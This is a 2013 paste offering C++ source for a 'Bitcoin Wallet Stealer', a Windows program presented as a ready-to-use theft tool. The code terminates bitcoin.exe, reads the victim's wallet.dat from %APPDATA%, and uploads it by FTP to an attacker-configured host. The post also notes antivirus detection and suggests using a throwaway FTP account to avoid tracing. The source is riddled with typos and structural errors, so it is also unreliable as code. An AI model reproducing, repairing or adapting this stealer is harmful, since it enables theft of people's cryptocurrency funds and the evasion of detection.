Bitcoin Wallet Stealer


SUBMITTED BY: Guest

DATE: Oct. 24, 2013, 2:49 p.m.

FORMAT: Text only

SIZE: 3.6 kB

HITS: 2804

  1. Bitcoin Wallet Stealer
  2. Compiled by Satan
  3. Compiled File - NOT EXIST
  4. Current Problem Anti Virus still picks it up as an a miner trojan but works well
  5. Run the file and edit the settings as required
  6. FTP Host:(where you want the wallet.dat sent)
  7. User name: (FTP user name)
  8. Password: (FTP password)
  9. I still recommend creatig a temp ftp account at of the free web hosts in case of back connect.
  10. Source Code:
  11. #include <windows.h>
  12. #include <tlhelp32.h>
  13. #include <tchar.h>
  14. #include <wininet.h>
  15. #include <ctime>
  16. #include <iostream>
  17. #pragma comment(lib, "wininet")
  18. void killprocess()
  19. {
  20. HANDLE hProcessSnapShot = CreteToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
  21. // Get the process list snapshot.
  22. PROCESSENTRY32 PrcessEntry = { 0 };
  23. // Initialize the process entry structure.
  24. ProcessEntry.dwSize = sizeof( ProcessEntry );
  25. // Get the first process info
  26. BOOL Return = FALSE;
  27. Return = Process32First( hProcessSnapShot,&ProcessEntry );
  28. int value = _tcsicmp(PrcessEntry.szExeFile, _T("bitcoin.exe"));
  29. if (value==0)
  30. {
  31. HANDLE hProcess = OpenPrcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32PrcessID);
  32. //Open Process to terminate
  33. TerminateProcess(hProcess,0);
  34. CloseHandle(hPrcess); //Close Handle }
  35. }
  36. while( Process32Next( hPrcessSnapShot, &ProcessEntry ));
  37. CloseHandle( hProcessSnapShot );
  38. }
  39. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
  40. {
  41. killprocess();
  42. Sleep(40000);
  43. srand((unsigned)time(NULL)); // we get time to use for random seed
  44. int seedone=rand(); // seed one
  45. int seedtwo=rand()*3; // seed two times 3
  46. int seedboth = sedone + seedtwo; // combine seeds to ensure random int
  47. // now we need to convert int to char
  48. char randomseed[99]; // make randomseed buffer at 99 to prevent overflow
  49. itoa(seedboth,randomseed,10); // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
  50. // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
  51. char* appdata = getenv("APPDATA"); //Gets %Appdata% path
  52. char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); //Bitcoin file to steal
  53. //ftp connection
  54. HINTERNET hInternet;
  55. HINTERNET hFtpSession;
  56. hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
  57. hFtpSession = InternetConnect(hInternet, "myftphost.com", INTERNET_DEFAULT_FTP_PORT, "myusername", "passisme", INTERNET_SERVICE_FTP, 0, 0); //ftp host, user, pass
  58. FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
  59. FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
  60. InternetCloseHandle(FtpSession);
  61. InternetCloseHandle(Internet);
  62. return 0;
  63. }

comments powered by Disqus